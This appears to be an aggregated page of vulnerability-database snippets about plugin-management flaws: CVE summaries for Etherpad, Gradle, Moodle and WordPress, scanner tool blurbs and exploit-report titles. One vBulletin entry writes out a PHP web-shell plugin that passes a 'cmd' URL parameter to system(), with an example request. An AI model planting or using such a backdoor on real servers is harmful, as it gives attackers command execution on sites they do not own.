CVE-2021-34816

An Argument Injection issue in the plugin management of Etherpad 1.8.13 allows privileged users to execute arbitrary code on the server by installing plugins from an attacker-controlled source...

Etherpad 参数注入漏洞

Etherpad is open source a Web-based online document collaboration tool . Multiple users can simultaneously write a text document through Etherpad , and see all the participants of real-time editing . Etherpad version 1.8.13 there is a security vulnerability , the vulnerability stems from a...

CVE-2021-29427

In Gradle from version 5.1 and before version 7.0 there is a vulnerability which can lead to information disclosure and/or dependency poisoning. Repository content filtering is a security control Gradle introduced to help users specify what repositories are used to resolve specific dependencies...

CVE-2021-29427

In Gradle from version 5.1 and before version 7.0 there is a vulnerability which can lead to information disclosure and/or dependency poisoning. Repository content filtering is a security control Gradle introduced to help users specify what repositories are used to resolve specific dependencies...

PT-2021-18203 · Gradle · Gradle

Name of the Vulnerable Software and Affected Versions: Gradle versions 5.1 through 6.x Description: The issue can lead to information disclosure and/or dependency poisoning due to Gradle ignoring content filters and searching all repositories for dependencies when repository content filtering is...

vulscan

This is a Python-based web application for vulnerability scanning and management. The application is built using Django and has several features, including: 1. Vulnerability Scanning: The application can scan for vulnerabilities in web applications using a variety of plugins POCs. 2. Plugin...

Security update for singularity (moderate)

openSUSE Security Update: Security update for singularity Announcement ID: openSUSE-SU-2019:2288-1 Rating: moderate References: 1125369 1128598 Cross-References: CVE-2019-11328 Affected Products: openSUSE Backports SLE-15-SP1 openSUSE Backports SLE-15 An update that solves one vulnerability and h...

Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting

Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting Exploit Title: Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting Google Dork: N/A Date: 2019-06-11 Exploit Author: Unk9vvN Vendor Homepage: https://duplicate-post.lopo.it/ Software Link: https://wordpress.org/plugins/duplicate-post/...

vulscan

This is a Python-based web application for vulnerability scanning and management. The application is built using Django and has several features, including: 1. Vulnerability Scanning: The application can scan for vulnerabilities in web applications using a variety of plugins and tools. 2. Plugin...

Fuxi Scanner - Network Security Vulnerability Scanner

Fuxi Scanner is an open source network security vulnerability scanner, it comes with multiple functions. Vulnerability detection & management Authentication Tester IT asset discovery & management Port scanner Subdomain scanner Acunetix Scanner Integrate Acunetix API Installation Documentation Usa...

e107 CMS 2.1.4 - Cross-Site Request Forgery

e107 CMS 2.1.4 - Cross-Site Request Forgery...

Cross site request forgery (csrf)

Cross-site request forgery CSRF vulnerability in mod/assign/adminmanageplugins.php in Moodle through 2.6.11, 2.7.x before 2.7.13, 2.8.x before 2.8.11, 2.9.x before 2.9.5, and 3.0.x before 3.0.3 allows remote attackers to hijack the authentication of administrators for requests that manage...

UBUNTU-CVE-2016-2157

Cross-site request forgery CSRF vulnerability in mod/assign/adminmanageplugins.php in Moodle through 2.6.11, 2.7.x before 2.7.13, 2.8.x before 2.8.11, 2.9.x before 2.9.5, and 3.0.x before 3.0.3 allows remote attackers to hijack the authentication of administrators for requests that manage...

Uber: Multiple vulnerabilities in a WordPress plugin at drive.uber.com

Hi again, The story begins when I started looking at https://drive.uber.com/ukmarketplace/welcome/, at the first glance I noticed that you are running WordPress 4.4.2 which you probably know is outdated now 1https://codex.wordpress.org/Version4.5Security . So first you need to update to the lates...

WordPress Email Queue 1.0.0 Cross Site Request Forgery

Plugin Name : Email Queue A8-Cross-SiteRequestForgeryCSRF Effected Version : 1.0.0 and most probably lower version's if any Vulnerability : A8-Cross-Site Request Forgery CSRF Identified by : Madhu Akula Technical Details Minimum Level of Access Required : Unauthenticated PoC - Proof of Concept : ...

DEBIAN-CVE-2012-2402

wp-admin/plugins.php in WordPress before 3.3.2 allows remote authenticated site administrators to bypass intended access restrictions and deactivate network-wide plugins via unspecified vectors...

Mozilla Weighing Opt-In Requirement for Web Plugins

Mozilla is developing a feature in Firefox that would require some user interaction in order for Flash ads, Java scripts and other content that uses plugins to play. In addition to easing system slowdowns, the opt-in for Web plugins is expected to reduce threats posed by exploiting security...

vBulletin Forum on the backend to get a shell and fix-vulnerability warning-the black bar safety net

In the background, into the plug-in management. Add the plug-in. Ajaxcomplete fill in the code: ifisset$GET'cmd'echo "h1cmd/h1pre"; system$GET'cmd';exit; To activate the mod Visit: www.badguest.cn /forumlocation/ajax. php? cmd=command For example: www. /forumlocation/ajax. php? cmd=ls, it execute...

eClime eCommerce JE 1.0.6b - SQL Injection Vulnerabilities

Document Title: =============== eClime eCommerce JE 1.0.6b - SQL Injection Vulnerabilities Release Date: ============= 2011-07-13 Vulnerability Laboratory ID VL-ID: ==================================== 82 Product & Service Introduction: =============================== eclime is a very powerful...

phpwebgallery-hijackexec.txt

$b'.$sort.';' 64. ; An attacker could be able to inject and execute PHP code through $GET'sort', that is passed to createfunction at line 63 see http://www.securityfocus.com/bid/31398. Only admin can access to the plugins management interface, but the attacker might be able to retrieve a valid...